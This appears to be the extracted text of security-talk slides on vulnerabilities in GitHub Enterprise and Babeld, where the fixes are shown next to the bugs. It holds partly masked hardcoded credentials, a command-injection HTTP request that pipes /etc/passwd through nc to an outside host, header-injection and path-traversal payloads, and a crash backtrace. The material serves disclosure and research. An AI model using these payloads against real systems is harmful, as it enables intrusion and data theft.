    Hardcoded credentials 22 auth ="apt:6YLkX******h0zXf" github_package_host = if hostname.end_with?(".iad.github.net") "packages.iad.github.net" else "packages-ext.iad.github.net" end set_up_source :id => "github", :deb => "https://#{auth}@#{github_package_host}/github-precise precise main", :key => "https://#{auth}@#{github_package_host}/pubkey.gpg?OCC30EA6" end Красный цвет не правильный
  • 23.
    Hardcoded credentials 23 uri =URI.parse("https://secure.braintreepaymentgateway.com/api/transact.php") http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_PEER if Rails.production? http.ca_file = "/usr/lib/ssl/certs/ca-certificates.crt" end params = { "transactionid" => transaction_id, "username" => "github", "password" => "g********6", … Красный цвет не правильный
  • 24.
    Enterprise manage app •8k+ LOC • The code is a mess 24
  • 25.
    enterprise-manage/current/lib/manage/api.rb 25 get "/cluster-preflight" do command= "sudo /usr/bin/env CLUSTER_ROLE=#{params[:type]} /usr/local/share/enterprise/ghe-preflight-check“ if system(command) status 200 else status 400 `#{command}` end end Красный цвет не правильный
  • 26.
    26 GET /setup/api/cluster- preflight?type=x%3Bcat+%2Fetc%2Fpasswd+%7C+nc+kyprizel.net+1114%3B HTTP/1.1 Host:10.0.0.22:8443 Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
  • 27.
    27 get "/cluster-preflight“ do role= params[:type] cluster_roles = %w(git web job mysql elasticsearch redis memcache metrics pages storage) if cluster_roles.include?(role) output = IO.popen(["sudo", "/usr/bin/env", "CLUSTER_ROLE=#{role}", "/usr/local/share/enterprise/ghe-preflight-check"]) { |io| io.read } if $?.exitstatus == 0 status 200 else status 400 output end else …
  • 28.
  • 29.
    csgtools 29 Constructive Solid GeometryGEM https://github.com/sshirokov/csgtool
  • 30.
  • 31.
  • 32.
    src/util.c 32 assert_mem(line = calloc(strlen(read_buffer)+ 1, sizeof(char))); strncpy(line, read_buffer, strlen(read_buffer)); // See if we need to finish reading the line while(line[strlen(line) - 1] != 'n') { rc = fgets(read_buffer, sizeof(read_buffer), f); if((rc == NULL) && feof(f)) { // We got everything that we can get, so we'll // call it a "line" break; } … Красный цвет не правильный
  • 33.
    src/util.c 33 assert_mem(line = calloc(strlen(read_buffer)+ 1, sizeof(char))); strncpy(line, read_buffer, strlen(read_buffer)); // See if we need to finish reading the line while(strlen(line) && line[strlen(line) - 1] != 'n') { rc = fgets(read_buffer, sizeof(read_buffer), f); if((rc == NULL) && feof(f)) { // We got everything that we can get, so we'll // call it a "line" break; } … Красный цвет не правильный
  • 34.
    Babeld as SVNproxy 34 haproxy babeld github app slumlord POST /auth GET /repo
  • 35.
    Babeld SVN auth 35 POST/auth/ HTTP/1.1 Host: local.github.test Content-Type: application/x-www-form-urlencoded Content-Length: 123 username=xxx&password=xxx&domain=local.github.test
  • 36.
    Babeld 36 GET /AAAAx512/BBBBx512/ HTTP/1.1 Host:local.github.test Host: someother.host Authorization: Basic … User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 Accept-Encoding: gzip DAV: http://subversion.tigris.org/xmlns/dav/svn/depth DAV: http://subversion.tigris.org/xmlns/dav/svn/mergeinfo DAV: http://subversion.tigris.org/xmlns/dav/svn/log-revprops Connection: close
  • 37.
    Babeld SVN auth 37 POST/auth/ HTTP/1.1 Host: local.github.test Content-Type: multipart/form-data Content-Length: 123 username=xxx&password=xxx&domain=someother.host
  • 38.
    Babeld DoS 38 GET /AAAAx512/BBBBx512/HTTP/1.1 Host: local.github.test Host: someother.host Authorization: Basic … X-GITHUB-REQUEST-ID: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 Accept-Encoding: gzip DAV: http://subversion.tigris.org/xmlns/dav/svn/depth DAV: http://subversion.tigris.org/xmlns/dav/svn/mergeinfo DAV: http://subversion.tigris.org/xmlns/dav/svn/log-revprops Connection: close
  • 39.
    39 EFLAGS: 0x10246 (carryPARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7fbdfb6a923e <_IO_vfprintf_internal+126>: mov QWORD PTR [rbp-0x450],rax 0x7fbdfb6a9245 <_IO_vfprintf_internal+133>: mov rax,QWORD PTR [r15+0x10] 0x7fbdfb6a9249 <_IO_vfprintf_internal+137>: mov QWORD PTR [rbp-0x448],rax => 0x7fbdfb6a9250 <_IO_vfprintf_internal+144>: call 0x7fbdfb6ef750 <strchrnul> 0x7fbdfb6a9255 <_IO_vfprintf_internal+149>: and r13d,0x8000 0x7fbdfb6a925c <_IO_vfprintf_internal+156>: mov QWORD PTR [rbp-0x4b8],rax 0x7fbdfb6a9263 <_IO_vfprintf_internal+163>: mov QWORD PTR [rbp-0x4a0],rax 0x7fbdfb6a926a <_IO_vfprintf_internal+170>: je 0x7fbdfb6a92f0 <_IO_vfprintf_internal+304> Guessed arguments: arg[0]: 0x44bc45 ("duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ") arg[1]: 0x25 ('%')
  • 40.
    40 gdb-peda$ bt #0 _IO_vfprintf_internal(s=s@entry=0x7fbdfc8224d0, format=format@entry=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ", ap=ap@entry=0x7fbdfc822638) at vfprintf.c:1315 #1 0x00007fbdfb6d5409 in _IO_vsnprintf (string=0x7fbdfc8228ef "", maxlen=<optimized out>, format=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ", args=args@entry=0x7fbdfc822638) at vsnprintf.c:119 #2 0x00007fbdfb6b3e22 in __snprintf (s=<optimized out>, maxlen=<optimized out>, format=<optimized out>) at snprintf.c:33 #3 0x0000000000417314 in log_with_timestamp (fmt=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ") at log.c:83 ...
  • 41.
    41 ... #250 0x0000000000417b8f inlog_with_timestamp (fmt=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ") at log.c:212 #251 0x000000000041272b in http_generic_client_thread (ctx=0x44bc45, handler=0x191) at http-server.c:303 #252 0x000000000041886b in http_svn_client_thread (arg=<optimized out>) at http- server-svn.c:42 #253 0x00007fbdfba160a4 in start_thread (arg=0x7fbdfc8e1700) at pthread_create.c:309 #254 0x00007fbdfb74b5dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111
  • 42.
    Babeld SVN auth •Login • User • Push-URL • Commit-URL • Hub-Path 42
  • 43.
    Babeld SVN proxy 43 GET/kyprizel/reponame/ HTTP/1.0 Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame Hub-Login: kyprizel Hub-User: kyprizel Hub-Email: [email protected] Hub-Timezone: Europe/Moscow Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285
  • 44.
  • 45.
  • 46.
  • 47.
  • 48.
    Whitelisted headers 48 GET /kyprizel/reponame/HTTP/1.0 Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980
  • 49.
    49 GET /kyprizel/reponame/ HTTP/1.0 Hub-Path:/data/repositories/4/nw/45/c4/8c/9/9.git Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame Hub-Login: kyprizel Hub-User: kyprizel Hub-Email: [email protected] Hub-Timezone: Europe/Moscow Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980
  • 50.
    50 GET /kyprizel/reponame/ HTTP/1.0 Host:localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980 User-Agent: AAAAx980
  • 51.
    51 GET /kyprizel/reponame/ HTTP/1.0 Hub-Path:/data/repositories/4/nw/45/c4/8c/9/9.git Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame Hub-Login: kyprizel Hub-User: kyprizel Hub-Email: [email protected] Hub-Timezone: Europe/Moscow Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980 User-Agent: AAAAx980
  • 52.
    52 GET /kyprizel/reponame/ HTTP/1.0 Host:localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980 User-Agent: AAAAx980 User-Agent: AAAAx980 … rnrn HUB-login: any-special-chars-here'"- Hub-SVN-Map-Push-URL: ?/../../../../../targetuser/private Hub-SVN-Commit-URL: ?/../../../../../targetuser/private Hub-Path: ./../arbitary
  • 53.
    53 GET /kyprizel/reponame/ HTTP/1.0 Hub-Path:/data/repositories/4/nw/45/c4/8c/9/9.git Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame Hub-Login: kyprizel Hub-User: kyprizel Hub-Email: [email protected] Hub-Timezone: Europe/Moscow Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980 User-Agent: AAAAx980 …
  • 54.
    54 User-Agent: AAAAx340 HUB-login: any-special-chars-here'"- Hub-SVN-Map-Push-URL:?/../../../../../targetuser/private Hub-SVN-Commit-URL: ?/../../../../../targetuser/private Hub-Path: ./../arbitrary We control headers rnrn We also control request body
  • 55.
    55 ::ffff:127.0.0.1 - kyprizel,special-chars-here'"- [21/Jan/2017:00:04:44+0000] - "GET /kyprizel/reponame/ HTTP/1.0" 500 5 0.0027 at=exception class=Rugged::OSError message="Failed to resolve path '/data/repositories/4/nw/45/c4/8c/9/9.git,./../arbitary': No such file or directory“
  • 56.